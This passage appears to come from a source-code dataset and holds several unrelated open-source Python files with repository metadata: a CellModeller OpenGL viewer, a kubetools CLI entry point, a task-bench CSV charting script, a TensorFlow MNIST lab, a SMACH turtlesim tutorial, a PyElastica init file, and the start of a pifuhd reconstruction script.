        glClearColor(0.5,0.5,0.5,0.0)
        glClear(GL_COLOR_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        #s = self.renderInfo.scale
        #glScalef(s,s,s)
        if self.sim:
            for r in self.sim.renderers:
                if r != None:
                    r.render_gl(self.selectedName)
        glPopMatrix()
    def drawWithNames(self):
        """Render with pick names for selection (GL selection pass)."""
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        #s = self.renderInfo.scale
        #glScalef(s,s,s)
        if self.sim:
            for r in self.sim.renderers:
                if r:
                    r.renderNames_gl()
        glPopMatrix()
class RenderInfo:
    """Holds the list of renderers and a global scale factor for the viewer."""

    def __init__(self):
        self.renderers = []
        self.scale = 1.0
    def addRenderer(self, renderer):
        self.renderers.append(renderer)
    def reset(self):
        """Drop all renderers and restore the default scale."""
        self.renderers = []
        self.scale = 1.0
    def setScale(self, s):
        self.scale = s
| 26.648649 | 86 | 0.556288 | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
    """OpenGL viewer widget that drives and displays a CellModeller simulation.

    Provides Qt slots to run/pause the simulation on a timer, load/reset the
    model module, toggle snapshot recording, and pick cells with the mouse;
    the selected cell's state is emitted as text via ``selectedCell``.
    """

    # Emitted with a human-readable dump of the selected cell's attributes.
    selectedCell = pyqtSignal(str)
    # GL picking name of the currently selected cell (-1 = nothing selected).
    selectedName = -1
    # Simulation timestep handed to Simulator.
    dt = 0.25

    def __init__(self, parent=None):
        PyGLWidget.__init__(self, parent)
        self.animTimer = QTimer()
        self.animTimer.timeout.connect(self.animate)
        self.renderInfo = None
        self.sim = None
        self.modfile = None
        self.record = False
        self.set_radius(32)
        self.frameNo = 0

    def help(self):
        pass

    def setSimulator(self, sim):
        """Attach an externally constructed Simulator."""
        self.sim = sim

    @pyqtSlot(bool)
    def toggleRun(self, run):
        """Start (interval 0 = run as fast as possible) or stop the animation timer."""
        if run:
            self.animTimer.start(0)
        else:
            self.animTimer.stop()

    @pyqtSlot(bool)
    def toggleRecord(self, rec):
        """Enable/disable snapshot recording and simulator state pickling."""
        self.record = rec
        self.sim.savePickle = rec

    @pyqtSlot()
    def reset(self):
        """Recreate the simulator from the most recently loaded module."""
        self.sim = Simulator(self.modname, self.dt)
        self.frameNo = 0

    @pyqtSlot()
    def load(self):
        """Prompt for a Python model module and load it."""
        qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
        self.modfile = str(qs)
        self.loadFile(self.modfile)

    def loadFile(self, modstr):
        """Load the model module at path ``modstr``, reusing the simulator if one exists."""
        (path, name) = os.path.split(modstr)
        modname = str(name).split('.')[0]
        self.modname = modname
        sys.path.append(path)
        if self.sim:
            self.sim.reset(modname)
        else:
            self.sim = Simulator(modname, self.dt)
        self.paintGL()

    def animate(self):
        """Advance the simulation one step; save a snapshot every 5th frame when recording."""
        if self.sim:
            self.sim.step()
            self.updateSelectedCell()
            self.frameNo += 1
            if self.record:
                if (self.frameNo % 5) == 0:
                    self.setSnapshotCounter(self.frameNo)
                    self.saveSnapshot()

    def updateSelectedCell(self):
        """Emit the selected cell's state as text; refresh the GL view every 100 steps."""
        if self.sim:
            states = self.sim.cellStates
            cid = self.selectedName
            txt = ''
            # BUG FIX: dict.has_key() was removed in Python 3 -- use `in`.
            if cid in states:
                s = states[cid]
                for (name, val) in s.__dict__.items():
                    if name not in CellState.excludeAttr:
                        vals = str(val)
                        txt = txt + name + ': ' + vals + '\n'
            self.selectedCell.emit(txt)
            if self.sim.stepNum % 100 == 0:
                self.updateGL()

    def postSelection(self, name):
        """Picking callback from PyGLWidget: remember the hit and refresh the info panel."""
        self.selectedName = name
        self.updateSelectedCell()

    def paintGL(self):
        """Clear to mid-grey and draw every renderer, highlighting the selection."""
        PyGLWidget.paintGL(self)
        glClearColor(0.5, 0.5, 0.5, 0.0)
        glClear(GL_COLOR_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r is not None:
                    r.render_gl(self.selectedName)
        glPopMatrix()

    def drawWithNames(self):
        """Render cells with GL picking names so postSelection can identify hits."""
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r:
                    r.renderNames_gl()
        glPopMatrix()
class RenderInfo:
    """Container tracking a list of renderers plus a display scale factor."""

    def __init__(self):
        # Start from the same clean state that reset() restores.
        self.reset()

    def addRenderer(self, renderer):
        """Register one more renderer for the draw pass."""
        self.renderers.append(renderer)

    def reset(self):
        """Drop all renderers and restore the default unit scale."""
        self.renderers = []
        self.scale = 1.0

    def setScale(self, s):
        """Set the display scale factor."""
        self.scale = s
| true | true |
f72edcdbbb2b57a739aa3dd65eb9b81da1a7a756 | 245 | py | Python | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 5 | 2020-04-20T21:24:14.000Z | 2022-01-29T15:35:02.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 69 | 2019-12-17T16:16:21.000Z | 2022-03-23T11:19:49.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 1 | 2022-01-14T04:12:15.000Z | 2022-01-14T04:12:15.000Z | #!/usr/bin/env python
# Entry point for `python -m kubetools.dev`: wires up the click CLI.
from kubetools.dev import dev
from kubetools.main import run_cli
# Import click command groups (imported for their registration side effects).
from kubetools.dev import (  # noqa: F401, I100, I202
    container,
    environment,
    logs,
    scripts,
)
# Hand control to the `dev` command group.
run_cli(dev)
| 15.3125 | 53 | 0.706122 |
from kubetools.dev import dev
from kubetools.main import run_cli
from kubetools.dev import (
container,
environment,
logs,
scripts,
)
run_cli(dev)
| true | true |
f72edd75707f96cb22c318119a9cfc892b3341ff | 4,296 | py | Python | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 23 | 2018-08-31T03:51:08.000Z | 2021-10-21T08:01:44.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 30 | 2018-06-27T19:45:53.000Z | 2022-03-23T04:26:11.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 26 | 2018-05-29T22:56:59.000Z | 2022-01-27T18:54:26.000Z | #!/usr/bin/env python3
# Copyright 2020 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
    """Accumulates strong-scaling results for one (ngraphs, dependence) config.

    Tracks the minimum elapsed time per (node count, column) cell, where the
    column is the total problem size when a specific system is requested and
    the system name otherwise; complete() emits the table as CSV on stdout.
    """
    def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
        self.ngraphs = ngraphs
        # Dependence types are stored with spaces in the data files.
        self.dependence = dependence.replace('_', ' ')
        self.system = system
        self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
        self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
        self.csv_dialect = csv_dialect
        # Column names discovered while processing rows.
        self.header = []
        # table[nodes][column] -> best (minimum) elapsed time seen so far.
        self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
        # metg[nodes] -> best (minimum) METG value seen so far.
        self.metg = collections.defaultdict(lambda: float('inf'))
    def filter(self, row):
        # Keep rows matching the requested graph count and dependence type,
        # and (when a system was given) that system's name.
        return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
    def process(self, row, data, metg=None):
        if self.system is not None:
            assert metg is not None
            # Track the best METG per node count when a system is pinned.
            self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
        # Re-zip the column-oriented data dict into per-sample records.
        for values in zip(*list(data.values())):
            items = dict(zip(data.keys(), values))
            # Total problem size = node count * per-node iterations.
            iterations = row['nodes'] * items['iterations']
            if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
                # Column key: problem size if a system is pinned, otherwise system name.
                name = iterations if self.system is not None else row['name']
                if name not in self.header:
                    self.header.append(name)
                # Keep the fastest (minimum) elapsed time for this cell.
                self.table[row['nodes']][name] = min(
                    items['elapsed'],
                    self.table[row['nodes']][name],
                    key=float)
    def error_value(self):
        # Value recorded for rows that failed to parse: an empty record.
        return {}
    def complete(self):
        # FIXME: This isn't actually the criteria we'd like to sort on,
        # we'd prefer to sort so that the list of names roughly parallels
        # the order of the bars in the graph.
        self.header.sort()
        if self.system is not None:
            self.header.reverse()
        self.header.insert(0, 'nodes')
        if self.system is not None:
            self.header.append('metg')
        # Emit one CSV row per node count; inf (never seen) becomes blank.
        out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
        out.writeheader()
        for nodes in sorted(self.table.keys()):
            row = self.table[nodes]
            row = {k: None if v == float('inf') else v for k, v in row.items()}
            row['nodes'] = nodes
            if self.system is not None:
                row['metg'] = self.metg[nodes]
            out.writerow(row)
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
    """Build a Parser for the requested configuration and run it over `machine`."""
    strong_parser = Parser(
        ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
    strong_parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
    # CLI entry point: parse flags and forward them verbatim to driver().
    parser = argparse.ArgumentParser()
    parser.add_argument('-g', '--ngraphs', type=int, required=True)
    parser.add_argument('-d', '--dependence', required=True)
    parser.add_argument('-s', '--system')
    parser.add_argument('--max-problem-size')
    parser.add_argument('--min-problem-size')
    parser.add_argument('-m', '--machine', required=True)
    parser.add_argument('-r', '--resource', default='flops')
    parser.add_argument('-t', '--threshold', type=float, default=0.5)
    parser.add_argument('--csv-dialect', default='excel-tab')
    parser.add_argument('-v', '--verbose', action='store_true')
    args = parser.parse_args()
    # Argument names match driver()'s parameters, so unpack directly.
    driver(**vars(args))
| 40.914286 | 162 | 0.649209 |
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
self.ngraphs = ngraphs
self.dependence = dependence.replace('_', ' ')
self.system = system
self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
self.csv_dialect = csv_dialect
self.header = []
self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
self.metg = collections.defaultdict(lambda: float('inf'))
def filter(self, row):
return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
def process(self, row, data, metg=None):
if self.system is not None:
assert metg is not None
self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
for values in zip(*list(data.values())):
items = dict(zip(data.keys(), values))
iterations = row['nodes'] * items['iterations']
if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
name = iterations if self.system is not None else row['name']
if name not in self.header:
self.header.append(name)
self.table[row['nodes']][name] = min(
items['elapsed'],
self.table[row['nodes']][name],
key=float)
def error_value(self):
return {}
def complete(self):
# the order of the bars in the graph.
self.header.sort()
if self.system is not None:
self.header.reverse()
self.header.insert(0, 'nodes')
if self.system is not None:
self.header.append('metg')
out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
out.writeheader()
for nodes in sorted(self.table.keys()):
row = self.table[nodes]
row = {k: None if v == float('inf') else v for k, v in row.items()}
row['nodes'] = nodes
if self.system is not None:
row['metg'] = self.metg[nodes]
out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--ngraphs', type=int, required=True)
parser.add_argument('-d', '--dependence', required=True)
parser.add_argument('-s', '--system')
parser.add_argument('--max-problem-size')
parser.add_argument('--min-problem-size')
parser.add_argument('-m', '--machine', required=True)
parser.add_argument('-r', '--resource', default='flops')
parser.add_argument('-t', '--threshold', type=float, default=0.5)
parser.add_argument('--csv-dialect', default='excel-tab')
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
driver(**vars(args))
| true | true |
f72ede905c2f5340f78dfcbe8efc10e27b0246a4 | 2,910 | py | Python | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 12 | 2018-03-07T00:44:56.000Z | 2019-01-25T11:07:43.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 3 | 2018-03-02T03:38:41.000Z | 2018-03-20T00:45:06.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 7 | 2018-03-02T07:14:53.000Z | 2019-01-04T08:06:47.000Z | # Lab 10 MNIST and NN
import tensorflow as tf
import random
# import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777) # reproducibility
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Check out https://www.tensorflow.org/get_started/mnist/beginners for
# more information about the mnist dataset
# parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
# input place holders
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & bias for nn layers
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
# define cost/loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train my model
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
# Get one and predict
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
# plt.imshow(mnist.test.images[r:r + 1].
# reshape(28, 28), cmap='Greys', interpolation='nearest')
# plt.show()
'''
Epoch: 0001 cost = 141.207671860
Epoch: 0002 cost = 38.788445864
Epoch: 0003 cost = 23.977515479
Epoch: 0004 cost = 16.315132428
Epoch: 0005 cost = 11.702554882
Epoch: 0006 cost = 8.573139748
Epoch: 0007 cost = 6.370995680
Epoch: 0008 cost = 4.537178684
Epoch: 0009 cost = 3.216900532
Epoch: 0010 cost = 2.329708954
Epoch: 0011 cost = 1.715552875
Epoch: 0012 cost = 1.189857912
Epoch: 0013 cost = 0.820965160
Epoch: 0014 cost = 0.624131458
Epoch: 0015 cost = 0.454633765
Learning Finished!
Accuracy: 0.9455
'''
| 30.631579 | 78 | 0.713746 |
import tensorflow as tf
import random
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777)
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.matmul(L2, W3) + b3
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
total_batch = int(mnist.train.num_examples / batch_size)
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
X: mnist.test.images, Y: mnist.test.labels}))
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
| true | true |
f72edefdeaa956c002a8aa8310ace417a58e9aff | 5,653 | py | Python | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 3 | 2021-12-30T21:56:58.000Z | 2022-02-20T11:19:12.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 10 | 2021-11-13T21:18:33.000Z | 2022-03-11T23:11:23.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 2 | 2022-02-06T11:24:43.000Z | 2022-02-09T20:13:40.000Z | #!/usr/bin/env python3
"""
Description:
Usage:
$> roslaunch turtle_nodes.launch
$> ./executive_step_06.py
Output:
[INFO] : State machine starting in initial state 'RESET' with userdata:
[INFO] : State machine transitioning 'RESET':'succeeded'-->'SPAWN'
[INFO] : State machine transitioning 'SPAWN':'succeeded'-->'TELEPORT1'
[INFO] : State machine transitioning 'TELEPORT1':'succeeded'-->'TELEPORT2'
[INFO] : State machine transitioning 'TELEPORT2':'succeeded'-->'DRAW_SHAPES'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : State machine starting in initial state 'DRAW_WITH_MONITOR' with userdata:
[]
[INFO] : Concurrence starting with userdata:
[]
[WARN] : Still waiting for action server 'turtle_shape1' to start... is it running?
[WARN] : Still waiting for action server 'turtle_shape2' to start... is it running?
[INFO] : Connected to action server 'turtle_shape2'.
[INFO] : Connected to action server 'turtle_shape1'.
[INFO] : Preempt requested on action 'turtle_shape2'
[INFO] : Preempt on action 'turtle_shape2' cancelling goal:
edges: 6
radius: 0.5
[INFO] : Concurrent Outcomes: {'MONITOR': 'invalid', 'DRAW': 'preempted'}
[INFO] : State machine transitioning 'DRAW_WITH_MONITOR':'interrupted'-->'WAIT_FOR_CLEAR'
[INFO] : State machine transitioning 'WAIT_FOR_CLEAR':'invalid'-->'DRAW_WITH_MONITOR'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : Concurrent Outcomes: {'MONITOR': 'preempted', 'DRAW': 'succeeded'}
[INFO] : State machine terminating 'DRAW_WITH_MONITOR':'succeeded':'succeeded'
[INFO] : Concurrent Outcomes: {'SMALL': 'succeeded', 'BIG': 'succeeded'}
[INFO] : State machine terminating 'DRAW_SHAPES':'succeeded':'succeeded'
"""
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
    """Build and run the SMACH use-case state machine on two turtlesim turtles.

    Resets turtlesim, spawns and teleports two turtles, then concurrently
    draws a big polygon (turtle 1) and a monitored small polygon (turtle 2);
    the small drawing is interrupted whenever turtle 1 comes near it.
    """
    rospy.init_node('smach_usecase_step_06')
    # Construct static goals
    polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
    polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
    # Create a SMACH state machine
    sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
    # Open the container
    with sm0:
        # Reset turtlesim
        StateMachine.add('RESET',
                ServiceState('reset', std_srvs.srv.Empty),
                {'succeeded':'SPAWN'})
        # Create a second turtle
        StateMachine.add('SPAWN',
                ServiceState('spawn', turtlesim.srv.Spawn,
                    request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
                {'succeeded':'TELEPORT1'})
        # Teleport turtle 1
        StateMachine.add('TELEPORT1',
                ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
                {'succeeded':'TELEPORT2'})
        # Teleport turtle 2
        StateMachine.add('TELEPORT2',
                ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
                {'succeeded':'DRAW_SHAPES'})
        # Draw some polygons: both child states must succeed for the
        # concurrence to succeed.
        shapes_cc = Concurrence(
                outcomes=['succeeded','aborted','preempted'],
                default_outcome='aborted',
                outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
        StateMachine.add('DRAW_SHAPES',shapes_cc)
        with shapes_cc:
            # Draw a large polygon with the first turtle
            Concurrence.add('BIG',
                    SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
                        goal = polygon_big))
            # Draw a small polygon with the second turtle, preempting the
            # draw as soon as any child (e.g. the monitor) terminates.
            draw_monitor_cc = Concurrence(
                    ['succeeded','aborted','preempted'],
                    'aborted',
                    child_termination_cb = lambda so: True,
                    outcome_map = {
                        'succeeded':{'DRAW':'succeeded'},
                        'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
                        'aborted':{'MONITOR':'invalid'}})
            Concurrence.add('SMALL',draw_monitor_cc)
            with draw_monitor_cc:
                Concurrence.add('DRAW',
                        SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
                            goal = polygon_small))
                def turtle_far_away(ud, msg):
                    """Return True while the turtle pose in msg is more than 2 units away from (9, 5)."""
                    if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
                        return True
                    return False
                Concurrence.add('MONITOR',
                        MonitorState('/turtle1/pose',turtlesim.msg.Pose,
                            cond_cb = turtle_far_away))
    # Attach a SMACH introspection server
    sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
    sis.start()
    # Set preempt handler
    smach.set_preempt_handler(sm0)
    # Execute SMACH tree in a separate thread so that we can ctrl-c the script
    smach_thread = threading.Thread(target = sm0.execute)
    smach_thread.start()
    # Signal handler
    rospy.spin()
if __name__ == '__main__':
    main()
| 39.809859 | 111 | 0.61401 |
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
rospy.init_node('smach_usecase_step_06')
polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
with sm0:
StateMachine.add('RESET',
ServiceState('reset', std_srvs.srv.Empty),
{'succeeded':'SPAWN'})
StateMachine.add('SPAWN',
ServiceState('spawn', turtlesim.srv.Spawn,
request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
{'succeeded':'TELEPORT1'})
StateMachine.add('TELEPORT1',
ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
{'succeeded':'TELEPORT2'})
StateMachine.add('TELEPORT2',
ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
{'succeeded':'DRAW_SHAPES'})
shapes_cc = Concurrence(
outcomes=['succeeded','aborted','preempted'],
default_outcome='aborted',
outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
StateMachine.add('DRAW_SHAPES',shapes_cc)
with shapes_cc:
Concurrence.add('BIG',
SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
goal = polygon_big))
draw_monitor_cc = Concurrence(
['succeeded','aborted','preempted'],
'aborted',
child_termination_cb = lambda so: True,
outcome_map = {
'succeeded':{'DRAW':'succeeded'},
'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
'aborted':{'MONITOR':'invalid'}})
Concurrence.add('SMALL',draw_monitor_cc)
with draw_monitor_cc:
Concurrence.add('DRAW',
SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
goal = polygon_small))
def turtle_far_away(ud, msg):
if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
return True
return False
Concurrence.add('MONITOR',
MonitorState('/turtle1/pose',turtlesim.msg.Pose,
cond_cb = turtle_far_away))
sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
sis.start()
smach.set_preempt_handler(sm0)
smach_thread = threading.Thread(target = sm0.execute)
smach_thread.start()
rospy.spin()
if __name__ == '__main__':
main()
| true | true |
f72edff35f01d27c9da2c2eae2c4065b8bc7ba12 | 146 | py | Python | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 71 | 2020-04-15T17:02:42.000Z | 2022-03-26T04:53:51.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 59 | 2020-05-15T03:51:46.000Z | 2022-03-28T13:53:01.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 57 | 2020-06-17T20:34:02.000Z | 2022-03-16T08:09:54.000Z | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| 29.2 | 49 | 0.787671 | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| true | true |
f72ee0a79d6772df7fd35864b092bd02cfb99099 | 8,117 | py | Python | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
